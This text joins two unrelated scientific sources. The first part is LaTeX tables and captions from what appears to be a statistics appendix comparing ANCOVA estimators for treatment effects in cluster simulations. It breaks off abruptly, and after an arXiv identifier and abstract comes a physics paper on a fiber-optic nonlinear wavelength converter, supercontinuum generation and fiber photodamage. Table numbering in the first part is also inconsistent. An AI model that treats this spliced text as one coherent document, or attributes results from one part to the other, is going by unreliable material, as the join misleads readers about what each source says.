\begin{table} \begin{tabular}{c c c c c c c c c c} \hline \hline & & & & & \multicolumn{3}{c}{ASE} & \multicolumn{3}{c}{Coverage} \\ \cline{6-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.005 & 0.140 & 0.163 & 0.193 & 0.158 & 0.967 & 0.924 \\ & AN I & -0.002 & 0.079 & 0.113 & 0.142 & 0.116 & 0.977 & 0.931 \\ & AN II & -0.007 & 0.098 & 0.126 & 0.131 & 0.109 & 0.934 & 0.894 \\ & AN III & -0.001 & 0.074 & 0.110 & 0.106 & 0.087 & 0.911 & 0.847 \\ & AN IV & -0.009 & 0.232 & 0.240 & 0.070 & 0.077 & 0.642 & 0.615 \\ \hline Scenario II & UN & -0.015 & 0.192 & 0.213 & 0.248 & 0.202 & 0.957 & 0.906 \\ & AN I & -0.008 & 0.098 & 0.139 & 0.157 & 0.131 & 0.947 & 0.903 \\ & AN II & -0.016 & 0.145 & 0.174 & 0.161 & 0.139 & 0.864 & 0.824 \\ & AN III & 0.003 & 0.115 & 0.153 & 0.136 & 0.113 & 0.886 & 0.827 \\ & AN IV & 0.008 & 0.242 & 0.260 & 0.069 & 0.072 & 0.528 & 0.502 \\ \hline Scenario III & UN & -0.010 & 0.165 & 0.195 & 0.222 & 0.181 & 0.956 & 0.903 \\ & AN I & -0.003 & 0.103 & 0.143 & 0.174 & 0.143 & 0.972 & 0.939 \\ & AN II & -0.020 & 0.133 & 0.165 & 0.166 & 0.139 & 0.930 & 0.890 \\ & AN III & 0.016 & 0.095 & 0.136 & 0.134 & 0.110 & 0.924 & 0.881 \\ & AN IV & 0.020 & 0.403 & 0.411 & 0.090 & 0.091 & 0.636 & 0.582 \\ \hline Scenario IV & UN & -0.168 & 0.155 & 0.176 & 0.202 & 0.165 & 0.969 & 0.929 \\ & AN I & -0.160 & 0.088 & 0.126 & 0.143 & 0.118 & 0.988 & 0.961 \\ & AN II & -0.255 & 0.123 & 0.150 & 0.140 & 0.118 & 0.938 & 0.888 \\ & AN III & -0.096 & 0.076 & 0.119 & 0.088 & 0.073 & 0.792 & 0.731 \\ & AN IV & 0.093 & 0.232 & 0.245 & 0.060 & 0.072 & 0.537 & 0.526 \\ \hline \hline \end{tabular} \end{table} Table 12: Results for the period-average treatment effect (\(\tau^{period}\)) from simulation study II comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=18\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. 
\begin{table} \begin{tabular}{c c c c c c c c c c} \hline \hline & & & & & \multicolumn{3}{c}{ASE} & \multicolumn{3}{c}{Coverage} \\ \cline{6-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.005 & 0.138 & 0.161 & 0.194 & 0.158 & 0.968 & 0.929 \\ & AN I & -0.001 & 0.078 & 0.113 & 0.143 & 0.117 & 0.978 & 0.943 \\ & AN II & -0.007 & 0.095 & 0.125 & 0.133 & 0.111 & 0.936 & 0.906 \\ & AN III & -0.001 & 0.073 & 0.110 & 0.107 & 0.088 & 0.919 & 0.854 \\ & AN IV & -0.010 & 0.230 & 0.239 & 0.071 & 0.076 & 0.653 & 0.624 \\ \hline Scenario II & UN & -0.007 & 0.188 & 0.210 & 0.247 & 0.202 & 0.960 & 0.913 \\ & AN I & 0.002 & 0.094 & 0.136 & 0.158 & 0.132 & 0.951 & 0.909 \\ & AN II & 0.005 & 0.142 & 0.173 & 0.163 & 0.140 & 0.882 & 0.826 \\ & AN III & 0.003 & 0.110 & 0.148 & 0.137 & 0.113 & 0.900 & 0.840 \\ & AN IV & 0.010 & 0.241 & 0.258 & 0.070 & 0.072 & 0.551 & 0.526 \\ \hline Scenario III & UN & 0.015 & 0.162 & 0.192 & 0.224 & 0.183 & 0.964 & 0.910 \\ & AN I & 0.023 & 0.102 & 0.140 & 0.176 & 0.145 & 0.972 & 0.940 \\ & AN II & 0.033 & 0.129 & 0.162 & 0.169 & 0.141 & 0.935 & 0.886 \\ & AN III & 0.020 & 0.093 & 0.133 & 0.135 & 0.111 & 0.936 & 0.884 \\ & AN IV & 0.027 & 0.359 & 0.370 & 0.091 & 0.092 & 0.648 & 0.599 \\ \hline Scenario IV & UN & 0.078 & 0.151 & 0.174 & 0.205 & 0.167 & 0.976 & 0.945 \\ & AN I & 0.073 & 0.087 & 0.127 & 0.145 & 0.120 & 0.987 & 0.949 \\ & AN II & 0.091 & 0.117 & 0.150 & 0.143 & 0.120 & 0.936 & 0.894 \\ & AN III & 0.074 & 0.077 & 0.120 & 0.089 & 0.074 & 0.796 & 0.743 \\ & AN IV & 0.098 & 0.225 & 0.239 & 0.061 & 0.070 & 0.527 & 0.537 \\ \hline \hline \end{tabular} \end{table} Table 13: Results for the cell-average treatment effect (\(\tau^{cell}\)) from simulation study II comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=18\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. #### Web Appendix A.4.2.2 When the number of clusters \(I=60\) Table A14: Results for the individual-average treatment effect (\(\tau^{ind}\)) from simulation study II comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=60\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. 
\begin{table} \begin{tabular}{c c c c c c c c c} \hline \hline & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{4-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.001 & 0.076 & 0.085 & 0.102 & 0.097 & 0.980 & 0.971 \\ & AN I & -0.002 & 0.042 & 0.058 & 0.077 & 0.073 & 0.984 & 0.979 \\ & AN II & -0.003 & 0.049 & 0.063 & 0.079 & 0.075 & 0.984 & 0.977 \\ & AN III & -0.002 & 0.040 & 0.057 & 0.060 & 0.057 & 0.951 & 0.946 \\ & AN IV & -0.005 & 0.042 & 0.058 & 0.054 & 0.052 & 0.927 & 0.915 \\ \hline Scenario II & UN & -0.004 & 0.103 & 0.117 & 0.127 & 0.121 & 0.964 & 0.947 \\ & AN I & -0.001 & 0.051 & 0.075 & 0.085 & 0.081 & 0.971 & 0.962 \\ & AN II & -0.002 & 0.073 & 0.090 & 0.095 & 0.092 & 0.956 & 0.947 \\ & AN III & 0.003 & 0.060 & 0.082 & 0.077 & 0.073 & 0.921 & 0.911 \\ & AN IV & 0.004 & 0.042 & 0.068 & 0.053 & 0.051 & 0.864 & 0.840 \\ \hline Scenario III & UN & -0.006 & 0.094 & 0.110 & 0.117 & 0.111 & 0.956 & 0.944 \\ & AN I & -0.001 & 0.057 & 0.079 & 0.093 & 0.088 & 0.978 & 0.971 \\ & AN II & -0.007 & 0.069 & 0.088 & 0.096 & 0.092 & 0.963 & 0.947 \\ & AN III & 0.005 & 0.053 & 0.077 & 0.074 & 0.070 & 0.940 & 0.919 \\ & AN IV & 0.011 & 0.057 & 0.080 & 0.067 & 0.064 & 0.896 & 0.884 \\ \hline Scenario IV & UN & -0.001 & 0.083 & 0.092 & 0.106 & 0.101 & 0.973 & 0.967 \\ & AN I & -0.001 & 0.047 & 0.064 & 0.078 & 0.074 & 0.988 & 0.983 \\ & AN II & -0.005 & 0.061 & 0.074 & 0.083 & 0.080 & 0.972 & 0.962 \\ & AN III & 0.006 & 0.042 & 0.061 & 0.052 & 0.049 & 0.834 & 0.814 \\ & AN IV & 0.012 & 0.044 & 0.062 & 0.047 & 0.045 & 0.783 & 0.769 \\ \hline \hline \end{tabular} \end{table} Table 15: Results for the period-average treatment effect (\(\tau^{period}\)) from simulation study II comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=60\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. 
\begin{table} \begin{tabular}{c c c c c c c c c} \hline \hline & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{4-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.001 & 0.074 & 0.084 & 0.101 & 0.096 & 0.984 & 0.973 \\ & AN I & -0.002 & 0.041 & 0.057 & 0.077 & 0.073 & 0.986 & 0.979 \\ & AN II & -0.003 & 0.048 & 0.062 & 0.078 & 0.075 & 0.985 & 0.978 \\ & AN III & -0.002 & 0.039 & 0.056 & 0.060 & 0.057 & 0.950 & 0.948 \\ & AN IV & -0.004 & 0.041 & 0.058 & 0.054 & 0.052 & 0.933 & 0.918 \\ \hline Scenario II & UN & -0.002 & 0.101 & 0.115 & 0.126 & 0.120 & 0.954 & 0.944 \\ & AN I & 0.003 & 0.050 & 0.073 & 0.084 & 0.080 & 0.974 & 0.966 \\ & AN II & 0.004 & 0.073 & 0.089 & 0.095 & 0.092 & 0.953 & 0.947 \\ & AN III & 0.002 & 0.058 & 0.080 & 0.076 & 0.072 & 0.928 & 0.918 \\ & AN IV & 0.004 & 0.041 & 0.067 & 0.053 & 0.051 & 0.874 & 0.859 \\ \hline Scenario III & UN & -0.001 & 0.093 & 0.109 & 0.116 & 0.110 & 0.957 & 0.942 \\ & AN I & 0.006 & 0.056 & 0.078 & 0.092 & 0.088 & 0.983 & 0.972 \\ & AN II & 0.007 & 0.068 & 0.087 & 0.096 & 0.092 & 0.968 & 0.961 \\ & AN III & 0.007 & 0.052 & 0.076 & 0.074 & 0.070 & 0.941 & 0.924 \\ & AN IV & 0.014 & 0.055 & 0.078 & 0.067 & 0.064 & 0.905 & 0.891 \\ \hline Scenario IV & UN & 0.006 & 0.083 & 0.092 & 0.106 & 0.101 & 0.970 & 0.963 \\ & AN I & 0.007 & 0.048 & 0.064 & 0.079 & 0.075 & 0.984 & 0.977 \\ & AN II & 0.008 & 0.061 & 0.074 & 0.084 & 0.080 & 0.967 & 0.962 \\ & AN III & 0.008 & 0.042 & 0.061 & 0.052 & 0.049 & 0.833 & 0.815 \\ & AN IV & 0.014 & 0.044 & 0.062 & 0.048 & 0.045 & 0.791 & 0.781 \\ \hline \hline \end{tabular} \end{table} Table 16: Results for the cell-average treatment effect (\(\tau^{cell}\)) from simulation study II comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=60\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. Figure A3: Relative efficiency of proposed estimators from simulation study II with 1,000 simulation replications with cell size as a covariate. UN = unadjusted, AN I-IV = ANCOVA I-IV. The number of clusters \(I=60\). Figure A4: Relative efficiency of proposed estimators from simulation study II with 1,000 simulation replications with cell size as a covariate. UN = unadjusted, AN I-IV = ANCOVA I-IV. The number of clusters \(I=18\). Web Appendix A4.3 Data Application: Additional Results Adjusting for Cluster-Period Size as an Additional Covariate
2305.08266
Fiber-optic nonlinear wavelength converter for adaptive femtosecond biophotonics
Broad and safe access to ultrafast laser technology has been hindered by the absence of optical fiber-delivered pulses with tunable central wavelength, pulse repetition rate, and pulse width in the picosecond-femtosecond regime. To address this long-standing obstacle, we developed a reliable accessory for femtosecond ytterbium fiber chirped pulse amplifiers, termed the fiber-optic nonlinear wavelength converter (FNWC), as an adaptive optical source for the emergent field of femtosecond biophotonics. This accessory empowers the fixed-wavelength laser to produce fiber-delivered ~20 nJ pulses with central wavelength across 950-1150 nm, repetition rate across 1-10 MHz, and pulse width across 40-400 fs, with a long-term stability of >2000 hrs. As a prototypical label-free application in biology and medicine, we demonstrate the utility of FNWC in real-time intravital imaging synergistically integrated with modern machine learning and large-scale fluorescence lifetime imaging microscopy.
Geng Wang, Jindou Shi, Rishyashring R. Iyer, Janet E. Sorrells, Haohua Tu
2023-05-14T22:11:00Z
http://arxiv.org/abs/2305.08266v2
# Fiber-optic nonlinear wavelength converter for adaptive femtosecond biophotonics ###### Abstract We develop a tunable and reliable accessory for femtosecond ytterbium fiber chirped pulse amplifiers, termed the fiber-optic nonlinear wavelength converter (FNWC), as an adaptive optical source for femtosecond biophotonics. This accessory empowers the laser to produce fiber-delivered \(\sim\)20 nJ pulses with central wavelength across 950-1150 nm, repetition rate across 1-10 MHz, and pulse width across 40-400 fs. The key enabling feature is the surprising suppression of the long-term fiber photodamage in coherent supercontinuum generation using a photonic crystal fiber with large-pitch small-hole lattice. The corresponding integrated laser may widen the access to tunable ultrafast laser technology in biology and medicine. Beckman Institute for Advanced Science and Technology, University of Illinois at Urbana-Champaign, Urbana, IL 61801, USA Department of Electrical and Computer Engineering, University of Illinois at Urbana-Champaign, Urbana, IL 61801, USA *[email protected] ## 1 Laser source engineering for femtosecond biophotonics Ultrafast laser engineering has produced mode-locked optical pulses with (sub-)picosecond duration (\(\tau\)) at a MHz-level repetition rate (\(f\)) [1] and driven the emergent field of femtosecond biophotonics [2]. These ultrashort pulses were first produced six years after the invention of the laser [3]. Subsequently, the Ti:sapphire crystal was recognized as a better lasing medium than dye solutions to support a broad range of near-infrared wavelengths (\(\lambda\)) [4]. The revolutionary development of Kerr lens mode-locking in 1990 [5] led to the commercialization of high average power (\(P\)) Ti:sapphire lasers tunable across 690-1020 nm. More recent innovation around 2010 resulted in an ytterbium-based optical parametric oscillator (OPO) with one output widely tunable across 680-1300 nm and another synergistic output fixed at \(\sim\)1040 nm [6]. Today, automatic wavelength tuning, beam pointing correction, and dispersion compensation have enabled many aspects of femtosecond biophotonics, including biological microscopy or clinical imaging [7], nanosurgery [8], and optogenetics [9]. However, despite decades of development of solid-state ultrafast sources, it remains technically challenging to tune the three pulse parameters of \(\lambda\), \(f\), and \(\tau\) independently and widely with sufficient output \(P\) or pulse energy (\(E\)). In particular, the typical inability to vary \(f\) not only limits the solid-state ultrafast lasers themselves, but also the subsequent wavelength-tuning accessories of optical parametric amplifier (OPA). In contrast to the solid-state lasers, ultrafast fiber lasers have played a relatively minor role in femtosecond biophotonics despite their rapid advances [10], largely due to the difficulty of tuning \(\lambda\) (and, to a lesser degree, \(\tau\) toward shorter durations). The fiber chirped pulse amplification (FCPA) [11] of a pulse-picked seed along a large-core ytterbium (Yb) gain fiber, which could be either a conventional circular fiber or a largely single-mode photonic crystal fiber such as DC-200/40-PZ-Yb (NKT Photonics) [12], has led to various commercial FCPA lasers (Table S1) useful for LASIK eye surgery and material processing.
These pulse-picked FCPA (pp-FCPA) lasers are advantageous over the solid-state lasers due to the ease of varying \(f\) at the same \(P\), i.e., pre-amplification pulse picking for variable \(E\). It seems that pairing one pp-FCPA laser with an OPA accessory would empower the tuning of \(\lambda\) and \(\tau\) (Table S1) to compete favorably with the solid-state lasers. However, the OPA is a largely free-space add-on that diminishes the fiber-optic advantages of the pp-FCPA laser, e.g., high resistance to environmental disturbance and good beam quality ensured by single-mode fiber propagation. Also, routine operation and maintenance of an integrated FCPA-OPA laser is often beyond the expertise of a life scientist. Thus, the tuning accessory based on OPA technology has limited the application of the otherwise attractive pp-FCPA lasers to compete with their solid-state counterparts. To overcome these OPA-related limitations, we aim to develop an alternative tuning accessory based on the seeding subunit of OPA technology [13], known as supercontinuum (or white-light) generation. ## 2 High peak-power coherent fiber supercontinuum generation Bulk-medium supercontinuum generation was demonstrated in glasses using ps pulses [14]. Later, fs pulses were more useful in the seed generation of a commercial OPA operated at 0.25 MHz [15] (Table S2), which also enabled the commercial OPA accessories of the pp-FCPA lasers toward larger \(f\) of \(\sim\)4 MHz (Table S1). Interestingly, photonic crystal fiber-based supercontinuum generation was first demonstrated using fs pulses [16], but ps pulses gained commercial success later due to their robust all-fiber setup [17] (Fig. 1a, Approach 1; Table S2). The success of this ps approach in wide spectral broadening has largely restricted the fs approach to an add-on nonlinear wavelength converter for a solid-state Ti:sapphire oscillator (Fig. 1a, Approach 2). A third approach has diverged from both all-fiber supercontinuum generation and the solid-state laser, and instead focused on coherent fiber supercontinuum generation [18] by a fs Yb:fiber laser free of pulse picking and a bare fiber several cm in length [19-21] (Fig. 1a, Approach 3). Despite this progress, the corresponding nonlinear fibers have a relatively small core (\(<\)12 \(\upmu\)m) and do not support high peak-power coherent fiber supercontinuum generation by the pp-FCPA lasers (Table S1). In this context, our recent attempt using a pp-FCPA laser (Satsuma, Amplitude) and a large-core (15 \(\upmu\)m) photonic crystal fiber (LMA-PM-15, NKT Photonics) [22] put us in a position to develop the alternative tuning accessory (Table S2). Unfortunately, we found that the corresponding supercontinuum generating fiber inevitably suffered irreversible photodamage after \(\sim\)100 hr of accumulative operation. This disruption prohibits the operation of the corresponding supercontinuum laser by a life scientist (without extensive laser training). It is thus important to identify the nature of this long-term photodamage and then avoid it. We aimed to answer whether this photodamage was caused by airborne contaminants in a non-clean-room environment and/or high peak-intensity free-space coupling at two fiber end facets, which could be avoided by commercial photonic crystal fiber end-capping/termination with specific hole collapsing and beam expansion [23] (Fig. 1a, Approach 2), or other more complicated mechanisms.
## 3 Experiment on two schemes of fiber supercontinuum Our custom-built coherent fiber supercontinuum source (Fig. 1a, Approach 3; Table S3, Scheme 1) enabled slide-free histochemistry [22], nonlinear optogenetics [24], and label-free imaging of extracellular vesicles [25]. The supercontinuum output along one principal axis of the polarization-maintaining (PM) LMA-PM-15 fiber with a high polarization extinction ratio (PER) reproducibly exhibited the same spectrum (Fig. 1b, Scheme 1) for different cleaved 25-cm fiber pieces (Table S3), as asserted by a deterministic model [26] taking account of polarization effects [27]. However, each piece encountered long-term photodamage after accumulative operation of 100\(\pm\)40 hr, resulting in gradually reduced (up to 10%) coupling efficiency not compensable by optical realignment, along with narrowed spectral broadening and often degraded output beam quality. We observed this fiber photodamage in another polarized supercontinuum source [28], except for the use of a non-FCPA operated at 40 MHz as the master laser (Table S3, Scheme 2). Although Scheme 2 matched Scheme 1 in input peak intensity (Table S3), the resulting supercontinuum produced a broader spectrum due to the lower dispersion of the fiber (Fig. 1b, bottom). However, photodamage with gradually reduced coupling efficiency was found to occur in a shorter timeframe of 10\(\pm\)2 hr (Table S3), so that the fiber had to be replaced daily in stain-free histopathology to obtain reproducible results [29]. This photodamage required replacement of the fiber with tedious optical realignments and thus limited the femtosecond biophotonic application of both schemes of supercontinuum source. We identified one key difference between the two schemes. The photodamage in Scheme 2 was localized within 1 cm beyond the entrance end of the fiber, as re-cleaving of this length for a damaged 25-cm fiber piece would recover the fiber coupling efficiency and supercontinuum bandwidth. In contrast, the photodamage in Scheme 1 was relatively delocalized, as re-cleaving up to 10-cm length beyond the entrance end of a damaged 25-cm fiber piece was needed to recover the fiber coupling efficiency. Figure 1: (a) Three general approaches for fiber supercontinuum generation: all-fiber splice often used in commercial supercontinuum lasers (Approach 1), commercial enclosed device with fiber capping and mode expansion as an add-on nonlinear wavelength converter for a Ti:sapphire oscillator (Approach 2), and mounted bare (polarization-maintaining) fiber for coherent fiber supercontinuum generation by a fs Yb:fiber laser (Approach 3). PP-FCPA – pulse-picked fiber chirped pulse amplifier, BB – beam blocker, HWP – halfwave plate, PBS – polarizing beam splitter, M – mirror, FL – focusing lens, PCF – photonic crystal fiber, CL – collimating lens; (b) three schemes of polarized coherent fiber supercontinuum generation under study with wavelength-dependent dispersion of photonic crystal fibers indicative of the restriction of supercontinuum generation to fiber normal dispersion regimes (top) with cross-sectional image of photonic crystal fibers indicative of pitch and hole sizes (inset), and corresponding spectra of supercontinuum outputs (bottom); (c) Output spectra at different \(f\) but the same \(E\) for Scheme 3 (top) in comparison with input spectra of the source laser (inset), and output spectra at different \(E\) but the same \(f\) for Scheme 3 (bottom) with cross-sectional images of the supercontinuum generating fiber (inset).
The observed localization of fiber photodamage and reduced coupling efficiency over time are inconsistent with airborne contamination in a non-clean-room environment and/or high peak-intensity free-space coupling. The former would lead to a rather sudden or random reduction of the coupling efficiency, while the latter would lead to spatiotemporally similar photodamage for the two schemes. Thus, the photodamage is unlikely to be mitigated by specific fiber end-capping with mode expansion (Fig. 1a, Approach 2). ## 4 Test on a third scheme of fiber supercontinuum The observed photodamage in Scheme 2 supports the interpretation based on the emergence of a photoscattering waveguide at the fiber entrance end [30, 31] in the form of a long-period fiber grating (LPFG) [32]. In this interpretation, an input pulse propagating in the core mode beats with the copropagating pulse in a cladding mode after free-space-to-fiber coupling to produce a standing wave that writes and progressively strengthens an LPFG. The period (\(\Lambda\)) of this LPFG is determined by the phase matching condition \(\Lambda=\lambda/(n_{\mathrm{co}}(\lambda)-n_{\mathrm{cl}}(\lambda))\), where \(\lambda\) is the central wavelength of the pulses while \(n_{\mathrm{co}}(\lambda)\) and \(n_{\mathrm{cl}}(\lambda)\) are the corresponding effective refractive indices of the core mode and cladding mode, respectively. The pulses have broad bandwidths (\(\sim\)10 nm for the 280 fs input and larger along the fiber for the core mode due to supercontinuum generation), from which the blue and red edges write slightly different grating periods and lead to the localized LPFG formation at the entrance end (because the superposition of the gratings from different wavelengths can be in phase for only a limited length). The temporal walk-off between the two pulses may also contribute to this localized LPFG formation. For a given \(\lambda\), the period \(\Lambda\) of a circular fiber can be calculated from the dielectric structure of the fiber cross section [32]. Similarly, \(\Lambda\) of a photonic crystal fiber can be calculated from the pitch and hole sizes of the fiber cross section (Fig. 1b, Inset) for the two schemes (Table S3), if \(n_{\mathrm{cl}}(\lambda)\) approximates the effective refractive index of the fundamental space-filling mode [33]. The much larger \(\Lambda\) in Scheme 1 as opposed to Scheme 2 is thus responsible for the more delocalized fiber photodamage needed to approach a similar LPFG strength (with dozens of periods) or loss of fiber coupling efficiency (10%), and for the slower LPFG formation via increased spectral broadening (supercontinuum generation) and/or pulse walk-off at longer fiber lengths. As a nontrivial prediction from this interpretation, the LPFG-based photodamage would disappear if the calculated \(\Lambda\) approaches the total length of the supercontinuum-generating fiber (because the LPFG would function poorly with only one period). To test this prediction, we developed a third scheme of supercontinuum generation using an ultra-large-core silica photonic crystal fiber (LMA-PM-40-FUD, NKT Photonics) that approximates the doped DC-200/40-PZ-Yb fiber in a PP-FCPA laser [12], with a cross section of large-pitch small-hole lattice (Table S3, Scheme 3). The selection of a short fiber length (9.0 cm) not only avoided undesirable bending effects [34] or depolarization effects [27], but also approached the calculated \(\Lambda\) from this fiber (Table S3).
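As a rough numerical illustration of the phase-matching relation above, the short sketch below evaluates \(\Lambda=\lambda/(n_{\mathrm{co}}-n_{\mathrm{cl}})\) for a few assumed effective-index differences; the values are chosen only to show orders of magnitude and are not computed from the actual fiber cross sections.

```python
# Illustrative evaluation of the LPFG phase-matching relation Lambda = lambda / (n_co - n_cl).
# The effective-index differences below are assumed values for illustration only; the real values
# must be computed from each fiber's pitch and hole sizes as described in the text.
wavelength_m = 1.03e-6  # ~1030 nm central wavelength

for delta_n in (1e-2, 1e-3, 1e-4, 1e-5):
    period_m = wavelength_m / delta_n
    print(f"n_co - n_cl = {delta_n:.0e}  ->  LPFG period = {period_m * 1e3:.2f} mm")

# A very small index contrast (around 1e-5, plausible when an ultra-large core makes the core mode
# nearly degenerate with the fundamental space-filling mode) pushes the period toward ~10 cm,
# comparable to the 9.0-cm fiber of Scheme 3, so the grating cannot accumulate multiple periods.
```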
Without the fiber end-capping (Fig. 1a, Approach 2), the resulting supercontinuum source (Fig. 1b, Scheme 3) remained stable after \(>\)2000 hours of accumulative operation within 2 years in a regular (non-clean-room) optical laboratory. This test validates our LPFG-based interpretation of fiber photodamage. Besides the suppression of the LPFG photodamage, the large core size (40 \(\upmu\)m) also scales up the peak power for tunable pulse generation (see below), just like that for non-dissipative [34] and dissipative soliton pulses [35]. ## 5 Fiber-optic nonlinear wavelength converter We next examined the dependence of the supercontinuum spectrum (Table S3, Scheme 3) on \(f\) of the master PP-FCPA laser at the same \(E\) (i.e., \(P/f\)). The laser/input spectrum and \(\tau\) were rather independent of \(f\), so that the supercontinuum output retained a similar spectrum across a wide \(f\) range of 2-10 MHz (Fig. 1c, top). This deterministic generation of coherent fiber supercontinuum is not surprising because the spectrum can be theoretically predicted if the spatiotemporal property of the input laser pulse is known [26]. Similar \(f\)-independent spectra were obtained at lower \(E\), so that the leftmost and rightmost spectral lobes may be filtered to generate compressed pulses [21] across 950-1110 nm, wherein they converge at 1030 nm (Fig. 1c, bottom). The observed \(f\)-independent supercontinuum generation resembles that of soliton generation [36]. Experimentally, the collimated fiber supercontinuum output was aligned along the horizontal polarization by an achromatic half-wave plate to enter a pulse dispersion compensation unit (Fig. 2a) in the form of a programmable pulse shaper (FemtoJock, Biophotonic Solutions), which was empowered by multiphoton intrapulse interference phase scan (MIIPS) [37] through a 128-pixel spatial light modulator (SLM) [38]. The pulse shaper spectrally selected a fixed-bandwidth window (\(\sim\)60 nm) inside the supercontinuum spectrum with a tunable central wavelength across 950-1110 nm after motorized rotation of the reflective grating of the pulse shaper to project this spectral window on the SLM [39]. For a pulse centered at \(\lambda=1030\) nm without the spectral lobe filtering or at a detuned \(\lambda\) (e.g., 1110 nm) with this filtering [21], the pulse shaper allowed compressing this pulse close to its transform-limited \(\tau\) (\(\sim\)60-fs FWHM or \(\sim\)40-fs sech\({}^{2}\)-shape) [37, 39] and chirping/tuning the pulse to \(\sim\)400 fs (Fig. 2b). Optionally, the free-space output from the pulse shaper was recoupled into a 1-m low-dispersion Kagome hollow-core fiber patch cable (PMC-C-Yb-7C, GLOphotonics) by an achromatic lens of 75-mm focal length, with a slightly \(\lambda\)-dependent efficiency of 76\(\pm\)3%. The weak birefringence intrinsic to the hollow-core fiber [40] allowed rotating the input polarization by a half-wave plate to maximize the PER of the fiber-delivered output to 10-20, depending on the bending state of the fiber. The spectrum and spatial beam profile of the fiber-delivered output after collimation by an achromatic lens (75-mm focal length) approximated those of the free-space input before the fiber, while the small pulse duration of the free-space input was largely retained (Fig. 2b). At the cost of 24% lower \(P\) or \(E\) and slightly degraded PER, the fiber pulse delivery gains several advantages over free-space pulse delivery: i) simple fiber telecommunication connection and disconnection allows easy switching among different optical fiber-coupled application modules, i.e. sharing the fiber-delivered output among these modules (Fig.
2a); ii) fiber delivery of energetic pulses is safer than free-space delivery for operators without extensive laser training; iii) the optimal fiber recoupling condition of the endless single-mode fiber supercontinuum [41, 42] is independent of \(\lambda\) (i.e. rotation of the grating in the pulse shaper), which can be useful to monitor and correct the misalignment of the pulse shaper itself [38] in portable applications of this tunable source (beyond an environmentally controlled laboratory). Figure 2: (a) Schematics of the fiber-optic nonlinear wavelength converter (FNWC) and related optical components for femtosecond biophotonics switchable between different applications by fiber-optic telecommunication connection and disconnection. PP-FCPA – pulse-picked fiber chirped pulse amplifier, BB – beam blocker, M – mirror, HWP – halfwave plate, PBS – polarizing beam splitter, FL – focusing lens, CL – collimating lens; (b) FNWC output spectrum (1030-nm central wavelength without filtering the supercontinuum), pulse width, spatial mode/profile, and full width at half maximum (FWHM) pulse width versus group delay dispersion (GDD) position before and after the 1-m Kagome hollow-core fiber (left), in comparison to the FNWC output spectrum (1110-nm central wavelength from filtered supercontinuum), pulse width, spatial mode/profile, and FWHM pulse width versus GDD position before and after the 1-m Kagome hollow-core fiber (right). The SLM-based pulse shaper is not necessary for the tunable fiber supercontinuum source with or without hollow-core fiber delivery when only tunable-\(\tau\) pulse generation (rather than arbitrary pulse shaping [39]) is needed. We tested a more cost-effective alternative, a single-prism pulse compressor (BOA-1050, Swamp Optics), and generated similar tunable-\(\lambda\) \(\sim\)40-fs (sech\({}^{2}\)) pulses by motorized rotation of the prism and the linear motion of a back retroreflector that varies the group delay dispersion (GDD) (Table S4), indicating that the chirp of this fixed-bandwidth pulse is largely linear. Due to the fiber input (supercontinuum generation) and optional fiber output (dispersion-free pulse transmission through the hollow-core fiber) of the dispersion compensation unit, we term the whole device a fiber-optic nonlinear wavelength converter (FNWC) (Fig. 2a, Table S4). Our FNWC may be generalized to other pp-FCPA lasers (Table S1) with \(f\)-independent emission spectra (Fig. 1c, top). In contrast to commercial alternatives such as an OPA or OPO, FNWC can independently and widely tune \(\lambda\), \(f\), and \(\tau\) (Tables S4, S5). There is room to further improve the existing FNWC technology. Broader bandwidths of fiber supercontinuum generation at high input powers may be possible if the multimodal behavior at longer wavelengths (\(>\)1120 nm) [12] and the bleed-through of the long-wavelength tail of the supercontinuum into the fiber anomalous dispersion regime (\(>\)1250 nm, Table S3) do not degrade single-mode coherent supercontinuum generation. Also, silica photonic crystal fibers with an even larger core, e.g., 100 \(\mu\)m (SC-1500/100-Si-ROD, NKT Photonics) [43], may further increase the peak power for supercontinuum generation and the resulting FNWC output while restricting the LPFG-based photodamage. Finally, the improvement of hollow-core delivery fibers in single-mode low-loss transmission [44], bending tolerance, and polarization maintenance may continue.
